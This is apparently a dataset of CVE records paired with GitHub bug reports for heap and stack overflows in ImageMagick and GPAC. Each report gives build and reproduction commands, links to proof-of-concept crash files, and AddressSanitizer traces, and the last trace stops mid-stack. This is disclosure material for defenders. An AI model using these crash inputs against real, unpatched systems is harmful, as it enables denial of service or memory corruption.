{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0284" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045943" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/e50f19fd73c792ebe912df8ab83aa51a243a3da7" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4729" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "90A073A6-900F-44EE-B29F-05CB65058078", "versionEndExcluding": "7.1.0-20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/4729
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-20 ### Operating system Linux ### Operating system, version and so on Linux ubuntu 5.4.0-73-generic #82~18.04.1-Ubuntu SMP Fri Apr 16 15:10:02 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ### Description Hi, ImageMagick security team This is ZhangJiaxing (@r0fm1a) from Codesafe Team of Legendsec at Qi'anxin Group. I've found a Heap Buffer Overflow vulnerability in ImageMagick 7.1.0-20.(github commit ID f54aa4e7ba8a8fb82d200844dc59804f5f6c8cbf in Tue Jan 18 20:00:38 2022 -0500).When someone uses magick to convert a tiff-format image into a picon-format file, the bug will be traggered on. Please feel free to contact me. Regards, ZhangJiaxing ### Steps to Reproduce 1. git clone ImageMagick 2. ./configure CC=gcc CFLAGS="-g -fsanitize=address" && make 3. cd utilities &&./magick convert /path/to/poc.tiff output.picon 4. The Asan logs are as follows: ==46632==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a00000b540 at pc 0x7f7e88ca3257 bp 0x7fffdb9f7370 sp 0x7fffdb9f7360 READ of size 4 at 0x62a00000b540 thread T0 #0 0x7f7e88ca3256 in GetPixelAlpha MagickCore/pixel-accessor.h:59 #1 0x7f7e88ca763e in WritePICONImage coders/xpm.c:807 #2 0x7f7e885f73ef in WriteImage MagickCore/constitute.c:1221 #3 0x7f7e885f84a0 in WriteImages MagickCore/constitute.c:1442 #4 0x7f7e87e5239f in ConvertImageCommand MagickWand/convert.c:3332 #5 0x7f7e87f604cf in MagickCommandGenesis MagickWand/mogrify.c:188 #6 0x55a7a3ebefcf in MagickMain utilities/magick.c:150 #7 0x55a7a3ebf25a in main utilities/magick.c:182 #8 0x7f7e876c2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #9 0x55a7a3ebe9e9 in _start (/home/r0fm1a/ImageMagick/utilities/.libs/magick+0x19e9) 0x62a00000b540 is located 0 bytes to the right of 21312-byte region [0x62a000006200,0x62a00000b540) allocated by thread T0 here: #0 0x7f7e893e3790 in posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdf790) #1 0x7f7e887d1c99 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x7f7e887d1ea8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x7f7e88582e0e in OpenPixelCache MagickCore/cache.c:3746 #4 0x7f7e8857b296 in GetImagePixelCache MagickCore/cache.c:1776 #5 0x7f7e8858b2de in SyncImagePixelCache MagickCore/cache.c:5516 #6 0x7f7e88798568 in SetImageStorageClass MagickCore/image.c:2626 #7 0x7f7e885ab718 in AcquireImageColormap MagickCore/colormap.c:152 #8 0x7f7e888731cd in SetGrayscaleImage MagickCore/quantize.c:3772 #9 0x7f7e888714e7 in QuantizeImage MagickCore/quantize.c:3118 #10 0x7f7e88866f5d in CompressImageColormap MagickCore/quantize.c:1204 #11 0x7f7e88ca6f6a in WritePICONImage coders/xpm.c:755 #12 0x7f7e885f73ef in WriteImage MagickCore/constitute.c:1221 #13 0x7f7e885f84a0 in WriteImages MagickCore/constitute.c:1442 #14 0x7f7e87e5239f in ConvertImageCommand MagickWand/convert.c:3332 #15 0x7f7e87f604cf in MagickCommandGenesis MagickWand/mogrify.c:188 #16 0x55a7a3ebefcf in MagickMain utilities/magick.c:150 #17 0x55a7a3ebf25a in main utilities/magick.c:182 #18 0x7f7e876c2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/pixel-accessor.h:59 in GetPixelAlpha Shadow bytes around the buggy address: 0x0c547fff9650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff96a0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c547fff96b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==46632==ABORTING ### Images [magick_heap_bof.zip](https://github.com/ImageMagick/ImageMagick/files/7894812/magick_heap_bof.zip)
Heap Buffer Overflow
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4729/comments
4
2022-01-19T07:07:49Z
2022-02-19T13:35:53Z
https://github.com/ImageMagick/ImageMagick/issues/4729
1,107,736,894
4,729
CVE-2022-1115
2022-08-29T15:15:10.297
A heap-buffer-overflow flaw was found in ImageMagick’s PushShortPixel() function of quantum-private.h file. This vulnerability is triggered when an attacker passes a specially crafted TIFF image file to ImageMagick for conversion, potentially leading to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-1115" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067022" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c8718305f120293d8bf13724f12eed885d830b09" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4974" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/1f860f52bd8d58737ad883072203391096b30b51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "62ED872E-70D8-4736-9876-F307A77839D4", "versionEndExcluding": "6.9.12-44", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A56872F-F8A5-4447-8D18-8DA94072BD22", "versionEndExcluding": "7.1.0-29", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/4974
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-28 ### Operating system Linux ### Operating system, version and so on OS: Ubuntu 20.04.3 LTS Version: ImageMagick 7.1.0-28 Q16-HDRI x86_64 2022-03-04 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI Delegates (built-in): bzlib fontconfig freetype jbig jng jpeg lzma pangocairo png tiff x xml zlib Compiler: gcc (4.2) ### Description Hello, We found a heap overflow vulnerability in magick ### Steps to Reproduce build it `CC=afl-clang-lto CXX=afl-clang-lto++ CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" ./configure --disable-shared --prefix="/root/fuzz/target/imagemagick/ImageMagick/install"` `AFL_USE_ASAN=1 make -j24 && make install -j24` run it `./magick convert poc /dev/null` output ================================================================= ==1195823==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000181c at pc 0x000000cd5328 bp 0x7ffdacd61fa0 sp 0x7ffdacd61f98 READ of size 1 at 0x61900000181c thread T0 #0 0xcd5327 in PushShortPixel /root/fuzz/target/image_magick/ImageMagick/./MagickCore/quantum-private.h #1 0xcd5327 in ImportRGBAQuantum /root/fuzz/target/image_magick/ImageMagick/MagickCore/quantum-import.c:4232:15 #2 0xcd5327 in ImportQuantumPixels /root/fuzz/target/image_magick/ImageMagick/MagickCore/quantum-import.c:4780:7 #3 0x13e73f2 in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:2052:24 #4 0x6f9981 in ReadImage /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:728:15 #5 0x6fe991 in ReadImages /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:1075:9 #6 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18 #7 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #8 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #9 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #10 0x7f499b68b0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x4ce36d in _start (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x4ce36d) 0x61900000181c is located 10 bytes to the right of 914-byte region [0x619000001480,0x619000001812) allocated by thread T0 here: #0 0x54ab1d in malloc (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x54ab1d) #1 0x13e6faf in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:1996:39 #2 0x6f9981 in ReadImage /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:728:15 #3 0x6fe991 in ReadImages /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:1075:9 #4 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18 #5 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #6 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #7 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #8 0x7f499b68b0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/fuzz/target/image_magick/ImageMagick/./MagickCore/quantum-private.h in PushShortPixel Shadow bytes around the buggy address: 0x0c327fff82b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8300: 00 00 02[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1195823==ABORTING ### Images [poc.zip](https://github.com/ImageMagick/ImageMagick/files/8320342/poc.zip)
heap-buffer-overflow in magick at quantum-private.h PushShortPixel
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4974/comments
1
2022-03-22T02:10:38Z
2022-03-24T01:28:05Z
https://github.com/ImageMagick/ImageMagick/issues/4974
1,176,173,021
4,974
CVE-2022-38530
2022-09-06T23:15:09.010
GPAC v2.1-DEV-rev232-gfcaa01ebb-master was discovered to contain a stack overflow when processing ISOM_IOD.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2216" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2216
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info:** ``` root:# MP4Box -version MP4Box - GPAC version 2.1-DEV-rev232-gfcaa01ebb-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **poc:**[poc](https://github.com/0xdd96/PoC/raw/main/gpac/gpac-isom_iod-stack-overflow) **command:** MP4Box -hint -out /dev/null $poc$ Here is the trace reported by ASAN: ``` root:# ./MP4Box -hint -out /dev/null poc [ODF] Error reading descriptor (tag 4 size 14): Invalid MPEG-4 Descriptor [iso file] Unknown box type tra7F in parent moov [ODF] Not enough bytes (3) to read descriptor (size=93) [ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor [iso file] Read Box "esds" (start 5507) failed (Invalid MPEG-4 Descriptor) - skipping [ODF] Not enough bytes (3) to read descriptor (size=93) [ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor [iso file] Unknown box type drB3f in parent dinf [iso file] Missing dref box in dinf [iso file] extra box maxr found in hinf, deleting Hinting track ID 1 - Type "mp4v:mp4v" (mpeg4-generic) - BW 1393 kbps Cannot create hinter (Invalid IsoMedia File) Track ID 6 disabled - skipping hint ASAN:DEADLYSIGNAL ================================================================= ==15396==ERROR: AddressSanitizer: stack-overflow on address 0x7fffff7feff8 (pc 0x7ffff6f1b64d bp 0x7ffff75d2320 sp 0x7fffff7ff000 T0) #0 0x7ffff6f1b64c (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c) #1 0x7ffff6f1b0e7 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x1030e7) #2 0x7ffff6e40271 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x28271) #3 0x7ffff6ef6b0a in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb0a) #4 0x7ffff1cba647 in gf_malloc utils/alloc.c:150 #5 0x7ffff269f8e6 in gf_odf_new_isom_iod odf/odf_code.c:739 #6 0x7ffff268357e in gf_odf_create_descriptor odf/desc_private.c:77 #7 0x7ffff2684794 in gf_odf_parse_descriptor odf/descriptors.c:88 #8 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #9 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #10 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #11 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #12 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #13 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #14 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #15 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #16 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #17 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #18 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #19 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #20 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #21 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #22 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #23 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #24 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #25 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #26 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #27 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #28 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #29 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #30 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #31 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #32 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #33 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #34 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #35 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #36 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #37 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #38 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #39 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #40 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #41 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #42 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #43 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #44 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #45 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #46 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #47 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #48 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #49 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #50 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #51 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #52 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #53 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #54 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #55 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #56 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #57 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #58 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #59 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #60 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #61 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #62 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #63 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #64 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #65 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #66 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #67 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #68 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #69 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #70 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #71 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #72 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #73 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #74 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #75 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #76 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #77 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #78 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #79 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #80 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #81 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #82 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #83 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #84 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #85 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #86 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #87 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #88 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #89 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #90 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #91 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #92 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #93 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #94 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #95 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #96 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #97 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #98 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #99 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #100 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #101 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #102 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #103 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #104 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #105 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #106 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #107 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #108 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #109 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #110 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #111 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #112 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #113 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #114 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #115 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #116 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #117 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #118 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #119 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #120 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #121 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #122 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #123 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #124 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #125 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #126 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #127 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #128 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #129 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #130 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #131 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #132 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #133 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #134 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #135 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #136 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #137 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #138 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #139 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #140 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #141 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #142 0x7ffff2684a45 